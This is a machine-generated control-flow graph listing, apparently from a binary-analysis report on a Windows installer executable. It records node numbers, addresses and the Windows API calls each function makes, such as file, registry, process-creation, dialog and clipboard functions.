3689->3691 3690->3691 3691->3682 3692 4046e0 DeleteObject 3691->3692 3693 4046e7 CreateBrushIndirect 3691->3693 3692->3693 3693->3682 3695 4066ab 17 API calls 3694->3695 3696 4045d5 SetDlgItemTextW 3695->3696 3696->3613 3697->3654 3698->3659 3699->3661 3822 4016cc 3823 402da6 17 API calls 3822->3823 3824 4016d2 GetFullPathNameW 3823->3824 3825 4016ec 3824->3825 3831 40170e 3824->3831 3828 4069a4 2 API calls 3825->3828 3825->3831 3826 401723 GetShortPathNameW 3827 402c2a 3826->3827 3829 4016fe 3828->3829 3829->3831 3832 40666e lstrcpynW 3829->3832 3831->3826 3831->3827 3832->3831 3833 401e4e GetDC 3834 402d84 17 API calls 3833->3834 3835 401e60 GetDeviceCaps MulDiv ReleaseDC 3834->3835 3836 402d84 17 API calls 3835->3836 3837 401e91 3836->3837 3838 4066ab 17 API calls 3837->3838 3839 401ece CreateFontIndirectW 3838->3839 3840 402638 3839->3840 3841 402950 3842 402da6 17 API calls 3841->3842 3844 40295c 3842->3844 3843 402972 3846 406139 2 API calls 3843->3846 3844->3843 3845 402da6 17 API calls 3844->3845 3845->3843 3847 402978 3846->3847 3869 40615e GetFileAttributesW CreateFileW 3847->3869 3849 402985 3850 402a3b 3849->3850 3853 4029a0 GlobalAlloc 3849->3853 3854 402a23 3849->3854 3851 402a42 DeleteFileW 3850->3851 3852 402a55 3850->3852 3851->3852 3853->3854 3855 4029b9 3853->3855 3856 403377 40 API calls 3854->3856 3870 4035fe SetFilePointer 3855->3870 3858 402a30 CloseHandle 3856->3858 3858->3850 3859 4029bf 3860 4035e8 ReadFile 3859->3860 3861 4029c8 GlobalAlloc 3860->3861 3862 4029d8 3861->3862 3863 402a0c 3861->3863 3864 403377 40 API calls 3862->3864 3865 406210 WriteFile 3863->3865 3868 4029e5 3864->3868 3866 402a18 GlobalFree 3865->3866 3866->3854 3867 402a03 GlobalFree 3867->3863 3868->3867 3869->3849 3870->3859 3871 401956 3872 402da6 17 API calls 3871->3872 3873 40195d lstrlenW 3872->3873 3874 402638 3873->3874 3875 4014d7 3876 402d84 17 API calls 3875->3876 3877 4014dd Sleep 3876->3877 3879 402c2a 3877->3879 3880 4020d8 3881 40219c 3880->3881 3882 4020ea 3880->3882 3884 401423 24 API calls 3881->3884 3883 402da6 17 API calls 3882->3883 3885 4020f1 3883->3885 3890 4022f6 3884->3890 3886 402da6 17 API calls 3885->3886 3887 4020fa 3886->3887 3888 402110 LoadLibraryExW 3887->3888 3889 402102 GetModuleHandleW 3887->3889 3888->3881 3891 402121 3888->3891 3889->3888 3889->3891 3900 406aaa 3891->3900 3894 402132 3897 401423 24 API calls 3894->3897 3898 402142 3894->3898 3895 40216b 3896 4056d0 24 API calls 3895->3896 3896->3898 3897->3898 3898->3890 3899 40218e FreeLibrary 3898->3899 3899->3890 3905 406690 WideCharToMultiByte 3900->3905 3902 406ac7 3903 40212c 3902->3903 3904 406ace GetProcAddress 3902->3904 3903->3894 3903->3895 3904->3903 3905->3902 3906 402b59 3907 402b60 3906->3907 3908 402bab 3906->3908 3910 402ba9 3907->3910 3912 402d84 17 API calls 3907->3912 3909 406a3b 5 API calls 3908->3909 3911 402bb2 3909->3911 3913 402da6 17 API calls 3911->3913 3914 402b6e 3912->3914 3915 402bbb 3913->3915 3916 402d84 17 API calls 3914->3916 3915->3910 3917 402bbf IIDFromString 3915->3917 3919 402b7a 3916->3919 3917->3910 3918 402bce 3917->3918 3918->3910 3924 40666e lstrcpynW 3918->3924 3923 4065b5 wsprintfW 3919->3923 3921 402beb CoTaskMemFree 3921->3910 3923->3910 3924->3921 3925 402a5b 3926 402d84 17 API calls 3925->3926 3927 402a61 3926->3927 3928 402aa4 3927->3928 3929 402a88 3927->3929 3936 40292e 3927->3936 3930 402abe 3928->3930 3931 402aae 3928->3931 3932 402a8d 3929->3932 3933 402a9e 3929->3933 3935 4066ab 17 API calls 3930->3935 3934 402d84 17 API calls 3931->3934 3939 40666e lstrcpynW 3932->3939 3933->3936 3940 4065b5 wsprintfW 3933->3940 3934->3933 3935->3933 3939->3936 3940->3936 3941 403cdb 3942 403ce6 3941->3942 3943 403cea 3942->3943 3944 403ced GlobalAlloc 3942->3944 3944->3943 3713 40175c 3714 402da6 17 API calls 3713->3714 3715 401763 3714->3715 3716 40618d 2 API calls 3715->3716 3717 40176a 3716->3717 3718 40618d 2 API calls 3717->3718 3718->3717 3945 401d5d 3946 402d84 17 API calls 3945->3946 3947 401d6e SetWindowLongW 3946->3947 3948 402c2a 3947->3948 3949 4028de 3950 4028e6 3949->3950 3951 4028ea FindNextFileW 3950->3951 3953 4028fc 3950->3953 3952 402943 3951->3952 3951->3953 3955 40666e lstrcpynW 3952->3955 3955->3953 3956 401563 3957 402ba4 3956->3957 3960 4065b5 wsprintfW 3957->3960 3959 402ba9 3960->3959 3961 401968 3962 402d84 17 API calls 3961->3962 3963 40196f 3962->3963 3964 402d84 17 API calls 3963->3964 3965 40197c 3964->3965 3966 402da6 17 API calls 3965->3966 3967 401993 lstrlenW 3966->3967 3969 4019a4 3967->3969 3968 4019e5 3969->3968 3973 40666e lstrcpynW 3969->3973 3971 4019d5 3971->3968 3972 4019da lstrlenW 3971->3972 3972->3968 3973->3971 3974 40166a 3975 402da6 17 API calls 3974->3975 3976 401670 3975->3976 3977 4069a4 2 API calls 3976->3977 3978 401676 3977->3978 3979 402aeb 3980 402d84 17 API calls 3979->3980 3981 402af1 3980->3981 3982 40292e 3981->3982 3983 4066ab 17 API calls 3981->3983 3983->3982 3984 4026ec 3985 402d84 17 API calls 3984->3985 3986 4026fb 3985->3986 3987 402745 ReadFile 3986->3987 3988 4061e1 ReadFile 3986->3988 3989 402785 MultiByteToWideChar 3986->3989 3990 40283a 3986->3990 3993 4027ab SetFilePointer MultiByteToWideChar 3986->3993 3994 40284b 3986->3994 3996 402838 3986->3996 3997 40623f SetFilePointer 3986->3997 3987->3986 3987->3996 3988->3986 3989->3986 4006 4065b5 wsprintfW 3990->4006 3993->3986 3995 40286c SetFilePointer 3994->3995 3994->3996 3995->3996 3998 40625b 3997->3998 4003 406273 3997->4003 3999 4061e1 ReadFile 3998->3999 4000 406267 3999->4000 4001 4062a4 SetFilePointer 4000->4001 4002 40627c SetFilePointer 4000->4002 4000->4003 4001->4003 4002->4001 4004 406287 4002->4004 4003->3986 4005 406210 WriteFile 4004->4005 4005->4003 4006->3996 3719 40176f 3720 402da6 17 API calls 3719->3720 3721 401776 3720->3721 3722 401796 3721->3722 3723 40179e 3721->3723 3758 40666e lstrcpynW 3722->3758 3759 40666e lstrcpynW 3723->3759 3726 40179c 3730 4068f5 5 API calls 3726->3730 3727 4017a9 3728 405f3d 3 API calls 3727->3728 3729 4017af lstrcatW 3728->3729 3729->3726 3746 4017bb 3730->3746 3731 4069a4 2 API calls 3731->3746 3732 406139 2 API calls 3732->3746 3734 4017cd CompareFileTime 3734->3746 3735 40188d 3737 4056d0 24 API calls 3735->3737 3736 401864 3738 4056d0 24 API calls 3736->3738 3747 401879 3736->3747 3740 401897 3737->3740 3738->3747 3739 40666e lstrcpynW 3739->3746 3741 403377 40 API calls 3740->3741 3742 4018aa 3741->3742 3743 4018be SetFileTime 3742->3743 3745 4018d0 CloseHandle 3742->3745 3743->3745 3744 4066ab 17 API calls 3744->3746 3745->3747 3748 4018e1 3745->3748 3746->3731 3746->3732 3746->3734 3746->3735 3746->3736 3746->3739 3746->3744 3754 405cce MessageBoxIndirectW 3746->3754 3757 40615e GetFileAttributesW CreateFileW 3746->3757 3749 4018e6 3748->3749 3750 4018f9 3748->3750 3752 4066ab 17 API calls 3749->3752 3751 4066ab 17 API calls 3750->3751 3753 401901 3751->3753 3755 4018ee lstrcatW 3752->3755 3756 405cce MessageBoxIndirectW 3753->3756 3754->3746 3755->3753 3756->3747 3757->3746 3758->3726 3759->3727 4007 401a72 4008 402d84 17 API calls 4007->4008 4009 401a7b 4008->4009 4010 402d84 17 API calls 4009->4010 4011 401a20 4010->4011 4012 401573 4013 401583 ShowWindow 4012->4013 4014 40158c 4012->4014 4013->4014 4015 402c2a 4014->4015 4016 40159a ShowWindow 4014->4016 4016->4015 4017 404a74 4018 404a84 4017->4018 4019 404aaa 4017->4019 4020 4045ca 18 API calls 4018->4020 4021 404631 8 API calls 4019->4021 4022 404a91 SetDlgItemTextW 4020->4022 4023 404ab6 4021->4023 4022->4019 4024 4023f4 4025 402da6 17 API calls 4024->4025 4026 402403 4025->4026 4027 402da6 17 API calls 4026->4027 4028 40240c 4027->4028 4029 402da6 17 API calls 4028->4029 4030 402416 GetPrivateProfileStringW 4029->4030 4031 4014f5 SetForegroundWindow 4032 402c2a 4031->4032 4033 401ff6 4034 402da6 17 API calls 4033->4034 4035 401ffd 4034->4035 4036 4069a4 2 API calls 4035->4036 4037 402003 4036->4037 4039 402014 4037->4039 4040 4065b5 wsprintfW 4037->4040 4040->4039 4041 401b77 4042 402da6 17 API calls 4041->4042 4043 401b7e 4042->4043 4044 402d84 17 API calls 4043->4044 4045 401b87 wsprintfW 4044->4045 4046 402c2a 4045->4046 4047 40167b 4048 402da6 17 API calls 4047->4048 4049 401682 4048->4049 4050 402da6 17 API calls 4049->4050 4051 40168b 4050->4051 4052 402da6 17 API calls 4051->4052 4053 401694 MoveFileW 4052->4053 4054 4016a7 4053->4054 4060 4016a0 4053->4060 4055 4069a4 2 API calls 4054->4055 4056 4022f6 4054->4056 4058 4016b6 4055->4058 4057 401423 24 API calls 4057->4056 4058->4056 4059 40642e 36 API calls 4058->4059 4059->4060 4060->4057 4061 4019ff 4062 402da6 17 API calls 4061->4062 4063 401a06 4062->4063 4064 402da6 17 API calls 4063->4064 4065 401a0f 4064->4065 4066 401a16 lstrcmpiW 4065->4066 4067 401a28 lstrcmpW 4065->4067 4068 401a1c 4066->4068 4067->4068 4069 4022ff 4070 402da6 17 API calls 4069->4070 4071 402305 4070->4071 4072 402da6 17 API calls 4071->4072 4073 40230e 4072->4073 4074 402da6 17 API calls 4073->4074 4075 402317 4074->4075 4076 4069a4 2 API calls 4075->4076 4077 402320 4076->4077 4078 402331 lstrlenW lstrlenW 4077->4078 4079 402324 4077->4079 4081 4056d0 24 API calls 4078->4081 4080 4056d0 24 API calls 4079->4080 4083 40232c 4079->4083 4080->4083 4082 40236f SHFileOperationW 4081->4082 4082->4079 4082->4083 4084 401000 4085 401037 BeginPaint GetClientRect 4084->4085 4086 40100c DefWindowProcW 4084->4086 4087 4010f3 4085->4087 4091 401179 4086->4091 4089 401073 CreateBrushIndirect FillRect DeleteObject 4087->4089 4090 4010fc 4087->4090 4089->4087 4092 401102 CreateFontIndirectW 4090->4092 4093 401167 EndPaint 4090->4093 4092->4093 4094 401112 6 API calls 4092->4094 4093->4091 4094->4093 4095 404700 lstrcpynW lstrlenW 4096 401d81 4097 401d94 GetDlgItem 4096->4097 4098 401d87 4096->4098 4100 401d8e 4097->4100 4099 402d84 17 API calls 4098->4099 4099->4100 4101 401dd5 GetClientRect LoadImageW SendMessageW 4100->4101 4102 402da6 17 API calls 4100->4102 4104 401e33 4101->4104 4106 401e3f 4101->4106 4102->4101 4105 401e38 DeleteObject 4104->4105 4104->4106 4105->4106 4107 401503 4108 40150b 4107->4108 4110 40151e 4107->4110 4109 402d84 17 API calls 4108->4109 4109->4110 4111 402383 4112 40238a 4111->4112 4114 40239d 4111->4114 4113 4066ab 17 API calls 4112->4113 4115 402397 4113->4115 4116 405cce MessageBoxIndirectW 4115->4116 4116->4114 4117 402c05 SendMessageW 4118 402c1f InvalidateRect 4117->4118 4119 402c2a 4117->4119 4118->4119 4120 404789 4122 4047a1 4120->4122 4128 4048bb 4120->4128 4121 404925 4123 4049ef 4121->4123 4124 40492f GetDlgItem 4121->4124 4125 4045ca 18 API calls 4122->4125 4131 404631 8 API calls 4123->4131 4126 4049b0 4124->4126 4127 404949 4124->4127 4130 404808 4125->4130 4126->4123 4135 4049c2 4126->4135 4127->4126 4134 40496f SendMessageW LoadCursorW SetCursor 4127->4134 4128->4121 4128->4123 4129 4048f6 GetDlgItem SendMessageW 4128->4129 4153 4045ec EnableWindow 4129->4153 4133 4045ca 18 API calls 4130->4133 4141 4049ea 4131->4141 4137 404815 CheckDlgButton 4133->4137 4157 404a38 4134->4157 4139 4049d8 4135->4139 4140 4049c8 SendMessageW 4135->4140 4136 404920 4154 404a14 4136->4154 4151 4045ec EnableWindow 4137->4151 4139->4141 4142 4049de SendMessageW 4139->4142 4140->4139 4142->4141 4146 404833 GetDlgItem 4152 4045ff SendMessageW 4146->4152 4148 404849 SendMessageW 4149 404866 GetSysColor 4148->4149 4150 40486f SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4148->4150 4149->4150 4150->4141 4151->4146 4152->4148 4153->4136 4155 404a22 4154->4155 4156 404a27 SendMessageW 4154->4156 4155->4156 4156->4121 4160 405c94 ShellExecuteExW 4157->4160 4159 40499e LoadCursorW SetCursor 4159->4126 4160->4159 4161 40248a 4162 402da6 17 API calls 4161->4162 4163 40249c 4162->4163 4164 402da6 17 API calls 4163->4164 4165 4024a6 4164->4165 4178 402e36 4165->4178 4168 4024de 4170 4024ea 4168->4170 4173 402d84 17 API calls 4168->4173 4169 402da6 17 API calls 4172 4024d4 lstrlenW 4169->4172 4174 402509 RegSetValueExW 4170->4174 4175 403377 40 API calls 4170->4175 4171 40292e 4172->4168 4173->4170 4176 40251f RegCloseKey 4174->4176 4175->4174 4176->4171 4179 402e51 4178->4179 4182 406509 4179->4182 4183 406518 4182->4183 4184 406523 RegCreateKeyExW 4183->4184 4185 4024b6 4183->4185 4184->4185 4185->4168 4185->4169 4185->4171 4186 40290b 4187 402da6 17 API calls 4186->4187 4188 402912 FindFirstFileW 4187->4188 4189 40293a 4188->4189 4193 402925 4188->4193 4194 4065b5 wsprintfW 4189->4194 4191 402943 4195 40666e lstrcpynW 4191->4195 4194->4191 4195->4193 4196 40190c 4197 401943 4196->4197 4198 402da6 17 API calls 4197->4198 4199 401948 4198->4199 4200 405d7a 67 API calls 4199->4200 4201 401951 4200->4201 4202 40190f 4203 402da6 17 API calls 4202->4203 4204 401916 4203->4204 4205 405cce MessageBoxIndirectW 4204->4205 4206 40191f 4205->4206 4207 40580f 4208 405830 GetDlgItem GetDlgItem GetDlgItem 4207->4208 4209 4059b9 4207->4209 4252 4045ff SendMessageW 4208->4252 4211 4059c2 GetDlgItem CreateThread CloseHandle 4209->4211 4212 4059ea 4209->4212 4211->4212 4214 405a01 ShowWindow ShowWindow 4212->4214 4215 405a3a 4212->4215 4216 405a15 4212->4216 4213 4058a0 4218 4058a7 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4213->4218 4254 4045ff SendMessageW 4214->4254 4222 404631 8 API calls 4215->4222 4217 405a75 4216->4217 4220 405a29 4216->4220 4221 405a4f ShowWindow 4216->4221 4217->4215 4227 405a83 SendMessageW 4217->4227 4225 405915 4218->4225 4226 4058f9 SendMessageW SendMessageW 4218->4226 4228 4045a3 SendMessageW 4220->4228 4223 405a61 4221->4223 4224 405a6f 4221->4224 4229 405a48 4222->4229 4230 4056d0 24 API calls 4223->4230 4231 4045a3 SendMessageW 4224->4231 4232 405928 4225->4232 4233 40591a SendMessageW 4225->4233 4226->4225 4227->4229 4234 405a9c CreatePopupMenu 4227->4234 4228->4215 4230->4224 4231->4217 4236 4045ca 18 API calls 4232->4236 4233->4232 4235 4066ab 17 API calls 4234->4235 4237 405aac AppendMenuW 4235->4237 4238 405938 4236->4238 4239 405ac9 GetWindowRect 4237->4239 4240 405adc TrackPopupMenu 4237->4240 4241 405941 ShowWindow 4238->4241 4242 405975 GetDlgItem SendMessageW 4238->4242 4239->4240 4240->4229 4244 405af7 4240->4244 4245 405964 4241->4245 4246 405957 ShowWindow 4241->4246 4242->4229 4243 40599c SendMessageW SendMessageW 4242->4243 4243->4229 4247 405b13 SendMessageW 4244->4247 4253 4045ff SendMessageW 4245->4253 4246->4245 4247->4247 4249 405b30 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4247->4249 4250 405b55 SendMessageW 4249->4250 4250->4250 4251 405b7e GlobalUnlock SetClipboardData CloseClipboard 4250->4251 4251->4229 4252->4213 4253->4242 4254->4216 4255 404e11 4256 404e21 4255->4256 4257 404e3d 4255->4257 4266 405cb2 GetDlgItemTextW 4256->4266 4259 404e70 4257->4259 4260 404e43 SHGetPathFromIDListW 4257->4260 4262 404e5a SendMessageW 4260->4262 4263 404e53 4260->4263 4261 404e2e SendMessageW 4261->4257 4262->4259 4265 40140b 2 API calls 4263->4265 4265->4262 4266->4261 4267 401491 4268 4056d0 24 API calls 4267->4268 4269 401498 4268->4269 4270 402891 4271 402898 4270->4271 4273 402ba9 4270->4273 4272 402d84 17 API calls 4271->4272 4274 40289f 4272->4274 4275 4028ae SetFilePointer 4274->4275 4275->4273 4276 4028be 4275->4276 4278 4065b5 wsprintfW 4276->4278 4278->4273 4279 401f12 4280 402da6 17 API calls 4279->4280 4281 401f18 4280->4281 4282 402da6 17 API calls 4281->4282 4283 401f21 4282->4283 4284 402da6 17 API calls 4283->4284 4285 401f2a 4284->4285 4286 402da6 17 API calls 4285->4286 4287 401f33 4286->4287 4288 401423 24 API calls 4287->4288 4289 401f3a 4288->4289 4296 405c94 ShellExecuteExW 4289->4296 4291 401f82 4292 406ae6 5 API calls 4291->4292 4294 40292e 4291->4294 4293 401f9f CloseHandle 4292->4293 4293->4294 4296->4291 4297 402f93 4298 402fa5 SetTimer 4297->4298 4299 402fbe 4297->4299 4298->4299 4300 40300c 4299->4300 4301 403012 MulDiv 4299->4301 4302 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4301->4302 4302->4300 4304 401d17 4305 402d84 17 API calls 4304->4305 4306 401d1d IsWindow 4305->4306 4307 401a20 4306->4307 4308 401b9b 4309 401ba8 4308->4309 4310 401bec 4308->4310 4313 401c31 4309->4313 4318 401bbf 4309->4318 4311 401bf1 4310->4311 4312 401c16 GlobalAlloc 4310->4312 4323 40239d 4311->4323 4329 40666e lstrcpynW 4311->4329 4315 4066ab 17 API calls 4312->4315 4314 4066ab 17 API calls 4313->4314 4313->4323 4317 402397 4314->4317 4315->4313 4321 405cce MessageBoxIndirectW 4317->4321 4327 40666e lstrcpynW 4318->4327 4319 401c03 GlobalFree 4319->4323 4321->4323 4322 401bce 4328 40666e lstrcpynW 4322->4328 4325 401bdd 4330 40666e lstrcpynW 4325->4330 4327->4322 4328->4325 4329->4319 4330->4323 4331 40261c 4332 402da6 17 API calls 4331->4332 4333 402623 4332->4333 4336 40615e GetFileAttributesW CreateFileW 4333->4336 4335 40262f 4336->4335 4337 40149e 4338 4014ac PostQuitMessage 4337->4338 4339 40239d 4337->4339 4338->4339 4340 40259e 4350 402de6 4340->4350 4343 402d84 17 API calls 4344 4025b1 4343->4344 4345 4025d9 RegEnumValueW 4344->4345 4346 4025cd RegEnumKeyW 4344->4346 4348 40292e 4344->4348 4347 4025ee RegCloseKey 4345->4347 4346->4347 4347->4348 4351 402da6 17 API calls 4350->4351 4352 402dfd 4351->4352 4353 4064db RegOpenKeyExW 4352->4353 4354 4025a8 4353->4354 4354->4343 4355 4015a3 4356 402da6 17 API calls 4355->4356 4357 4015aa SetFileAttributesW 4356->4357 4358 4015bc 4357->4358 3288 401fa4 3289 402da6 17 API calls 3288->3289 3290 401faa 3289->3290 3291 4056d0 24 API calls 3290->3291 3292 401fb4 3291->3292 3303 405c51 CreateProcessW 3292->3303 3295 401fdd CloseHandle 3298 40292e 3295->3298 3299 401fcf 3300 401fd4 3299->3300 3301 401fdf 3299->3301 3311 4065b5 wsprintfW 3300->3311 3301->3295 3304 401fba 3303->3304 3305 405c84 CloseHandle 3303->3305 3304->3295 3304->3298 3306 406ae6 WaitForSingleObject 3304->3306 3305->3304 3307 406b00 3306->3307 3308 406b12 GetExitCodeProcess 3307->3308 3312 406a77 3307->3312 3308->3299 3311->3295 3313 406a94 PeekMessageW 3312->3313 3314 406aa4 WaitForSingleObject 3313->3314 3315 406a8a DispatchMessageW 3313->3315 3314->3307 3315->3313 4359 40202a 4360 402da6 17 API calls 4359->4360 4361 402031 4360->4361 4362 406a3b 5 API calls 4361->4362 4363 402040 4362->4363 4364 4020cc 4363->4364 4365 40205c GlobalAlloc 4363->4365 4365->4364 4366 402070 4365->4366 4367 406a3b 5 API calls 4366->4367 4368 402077 4367->4368 4369 406a3b 5 API calls 4368->4369 4370 402081 4369->4370 4370->4364 4374 4065b5 wsprintfW 4370->4374 4372 4020ba 4375 4065b5 wsprintfW 4372->4375 4374->4372 4375->4364 4376 40252a 4377 402de6 17 API calls 4376->4377 4378 402534 4377->4378 4379 402da6 17 API calls 4378->4379 4380 40253d 4379->4380 4381 402548 RegQueryValueExW 4380->4381 4382 40292e 4380->4382 4383 402568 4381->4383 4386 40256e RegCloseKey 4381->4386 4383->4386 4387 4065b5 wsprintfW 4383->4387 4386->4382 4387->4386 4388 4021aa 4389 402da6 17 API calls 4388->4389 4390 4021b1 4389->4390 4391 402da6 17 API calls 4390->4391 4392 4021bb 4391->4392 4393 402da6 17 API calls 4392->4393 4394 4021c5 4393->4394 4395 402da6 17 API calls 4394->4395 4396 4021cf 4395->4396 4397 402da6 17 API calls 4396->4397 4398 4021d9 4397->4398 4399 402218 CoCreateInstance 4398->4399 4400 402da6 17 API calls 4398->4400 4403 402237 4399->4403 4400->4399 4401 401423 24 API calls 4402 4022f6 4401->4402 4403->4401 4403->4402 3700 403c2b 3701 403c46 3700->3701 3702 403c3c CloseHandle 3700->3702 3703 403c50 CloseHandle 3701->3703 3704 403c5a 3701->3704 3702->3701 3703->3704 3709 403c88 3704->3709 3707 405d7a 67 API calls 3708 403c6b 3707->3708 3710 403c96 3709->3710 3711 403c5f 3710->3711 3712 403c9b FreeLibrary GlobalFree 3710->3712 3711->3707 3712->3711 3712->3712 4404 401a30 4405 402da6 17 API calls 4404->4405 4406 401a39 ExpandEnvironmentStringsW 4405->4406 4407 401a4d 4406->4407 4409 401a60 4406->4409 4408 401a52 lstrcmpW 4407->4408 4407->4409 4408->4409 4415 4023b2 4416 4023c0 4415->4416 4417 4023ba 4415->4417 4419 4023ce 4416->4419 4420 402da6 17 API calls 4416->4420 4418 402da6 17 API calls 4417->4418 4418->4416 4421 4023dc 4419->4421 4423 402da6 17 API calls 4419->4423 4420->4419 4422 402da6 17 API calls 4421->4422 4424 4023e5 WritePrivateProfileStringW 4422->4424 4423->4421 4425 402434 4426 402467 4425->4426 4427 40243c 4425->4427 4429 402da6 17 API calls 4426->4429 4428 402de6 17 API calls 4427->4428 4430 402443 4428->4430 4431 40246e 4429->4431 4433 40247b 4430->4433 4434 402da6 17 API calls 4430->4434 4436 402e64 4431->4436 4435 402454 RegDeleteValueW RegCloseKey 4434->4435 4435->4433 4437 402e78 4436->4437 4439 402e71 4436->4439 4437->4439 4440 402ea9 4437->4440 4439->4433 4441 4064db RegOpenKeyExW 4440->4441 4442 402ed7 4441->4442 4443 402f81 4442->4443 4444 402ee7 RegEnumValueW 4442->4444 4448 402f0a 4442->4448 4443->4439 4445 402f71 RegCloseKey 4444->4445 4444->4448 4445->4443 4446 402f46 RegEnumKeyW 4447 402f4f RegCloseKey 4446->4447 4446->4448 4449 406a3b 5 API calls 4447->4449 4448->4445 4448->4446 4448->4447 4450 402ea9 6 API calls 4448->4450 4451 402f5f 4449->4451 4450->4448 4451->4443 4452 402f63 RegDeleteKeyW 4451->4452 4452->4443 4453 401735 4454 402da6 17 API calls 4453->4454 4455 40173c SearchPathW 4454->4455 4456 401757 4455->4456 4457 405037 GetDlgItem GetDlgItem 4458 405089 7 API calls 4457->4458 4469 4052ae 4457->4469 4459 405130 DeleteObject 4458->4459 4460 405123 SendMessageW 4458->4460 4461 405139 4459->4461 4460->4459 4463 405170 4461->4463 4464 4066ab 17 API calls 4461->4464 4462 405390 4466 40543c 4462->4466 4476 4053e9 SendMessageW 4462->4476 4500 4052a1 4462->4500 4465 4045ca 18 API calls 4463->4465 4470 405152 SendMessageW SendMessageW 4464->4470 4471 405184 4465->4471 4467 405446 SendMessageW 4466->4467 4468 40544e 4466->4468 4467->4468 4478 405460 ImageList_Destroy 4468->4478 4479 405467 4468->4479 4492 405477 4468->4492 4469->4462 4474 404f85 5 API calls 4469->4474 4491 40531d 4469->4491 4470->4461 4475 4045ca 18 API calls 4471->4475 4472 405382 SendMessageW 4472->4462 4473 404631 8 API calls 4477 40563d 4473->4477 4474->4491 4489 405195 4475->4489 4481 4053fe SendMessageW 4476->4481 4476->4500 4478->4479 4482 405470 GlobalFree 4479->4482 4479->4492 4480 4055f1 4485 405603 ShowWindow GetDlgItem ShowWindow 4480->4485 4480->4500 4484 405411 4481->4484 4482->4492 4483 405270 GetWindowLongW SetWindowLongW 4486 405289 4483->4486 4493 405422 SendMessageW 4484->4493 4485->4500 4487 4052a6 4486->4487 4488 40528e ShowWindow 4486->4488 4510 4045ff SendMessageW 4487->4510 4509 4045ff SendMessageW 4488->4509 4489->4483 4490 4051e8 SendMessageW 4489->4490 4494 40526b 4489->4494 4497 405226 SendMessageW 4489->4497 4498 40523a SendMessageW 4489->4498 4490->4489 4491->4462 4491->4472 4492->4480 4499 405005 4 API calls 4492->4499 4504 4054b2 4492->4504 4493->4466 4494->4483 4494->4486 4497->4489 4498->4489 4499->4504 4500->4473 4501 4055bc 4502 4055c7 InvalidateRect 4501->4502 4505 4055d3 4501->4505 4502->4505 4503 4054e0 SendMessageW 4508 4054f6 4503->4508 4504->4503 4504->4508 4505->4480 4511 404f40 4505->4511 4507 40556a SendMessageW SendMessageW 4507->4508 4508->4501 4508->4507 4509->4500 4510->4469 4514 404e77 4511->4514 4513 404f55 4513->4480 4515 404e90 4514->4515 4516 4066ab 17 API calls 4515->4516 4517 404ef4 4516->4517 4518 4066ab 17 API calls 4517->4518 4519 404eff 4518->4519 4520 4066ab 17 API calls 4519->4520 4521 404f15 lstrlenW wsprintfW SetDlgItemTextW 4520->4521 4521->4513 4522 401d38 4523 402d84 17 API calls 4522->4523 4524 401d3f 4523->4524 4525 402d84 17 API calls 4524->4525 4526 401d4b GetDlgItem 4525->4526 4527 402638 4526->4527 4528 4014b8 4529 4014be 4528->4529 4530 401389 2 API calls 4529->4530 4531 4014c6 4530->4531 4532 40473a lstrlenW 4533 404759 4532->4533 4534 40475b WideCharToMultiByte 4532->4534 4533->4534 4535 404abb 4536 404ae7 4535->4536 4537 404af8 4535->4537 4596 405cb2 GetDlgItemTextW 4536->4596 4539 404b04 GetDlgItem 4537->4539 4545 404b63 4537->4545 4542 404b18 4539->4542 4540 404c47 4546 404df6 4540->4546 4598 405cb2 GetDlgItemTextW 4540->4598 4541 404af2 4543 4068f5 5 API calls 4541->4543 4544 404b2c SetWindowTextW 4542->4544 4549 405fe8 4 API calls 4542->4549 4543->4537 4550 4045ca 18 API calls 4544->4550 4545->4540 4545->4546 4551 4066ab 17 API calls 4545->4551 4548 404631 8 API calls 4546->4548 4553 404e0a 4548->4553 4554 404b22 4549->4554 4555 404b48 4550->4555 4556 404bd7 SHBrowseForFolderW 4551->4556 4552 404c77 4557 406045 18 API calls 4552->4557 4554->4544 4561 405f3d 3 API calls 4554->4561 4558 4045ca 18 API calls 4555->4558 4556->4540 4559 404bef CoTaskMemFree 4556->4559 4560 404c7d 4557->4560 4562 404b56 4558->4562 4563 405f3d 3 API calls 4559->4563 4599 40666e lstrcpynW 4560->4599 4561->4544 4597 4045ff SendMessageW 4562->4597 4565 404bfc 4563->4565 4568 404c33 SetDlgItemTextW 4565->4568 4572 4066ab 17 API calls 4565->4572 4567 404b5c 4570 406a3b 5 API calls 4567->4570 4568->4540 4569 404c94 4571 406a3b 5 API calls 4569->4571 4570->4545 4578 404c9b 4571->4578 4574 404c1b lstrcmpiW 4572->4574 4573 404cdc 4600 40666e lstrcpynW 4573->4600 4574->4568 4575 404c2c lstrcatW 4574->4575 4575->4568 4577 404ce3 4579 405fe8 4 API calls 4577->4579 4578->4573 4583 405f89 2 API calls 4578->4583 4584 404d34 4578->4584 4580 404ce9 GetDiskFreeSpaceW 4579->4580 4582 404d0d MulDiv 4580->4582 4580->4584 4582->4584 4583->4578 4585 404da5 4584->4585 4587 404f40 20 API calls 4584->4587 4586 404dc8 4585->4586 4588 40140b 2 API calls 4585->4588 4601 4045ec EnableWindow 4586->4601 4589 404d92 4587->4589 4588->4586 4591 404da7 SetDlgItemTextW 4589->4591 4592 404d97 4589->4592 4591->4585 4594 404e77 20 API calls 4592->4594 4593 404de4 4593->4546 4595 404a14 SendMessageW 4593->4595 4594->4585 4595->4546 4596->4541 4597->4567 4598->4552 4599->4569 4600->4577 4601->4593 4602 40263e 4603 402652 4602->4603 4604 40266d 4602->4604 4605 402d84 17 API calls 4603->4605 4606 402672 4604->4606 4607 40269d 4604->4607 4613 402659 4605->4613 4608 402da6 17 API calls 4606->4608 4609 402da6 17 API calls 4607->4609 4610 402679 4608->4610 4611 4026a4 lstrlenW 4609->4611 4619 406690 WideCharToMultiByte 4610->4619 4611->4613 4616 40623f 5 API calls 4613->4616 4617 4026e7 4613->4617 4618 4026d1 4613->4618 4614 40268d lstrlenA 4614->4613 4615 406210 WriteFile 4615->4617 4616->4618 4618->4615 4618->4617 4619->4614

          Control-flow Graph

          • Executed
          • Not Executed
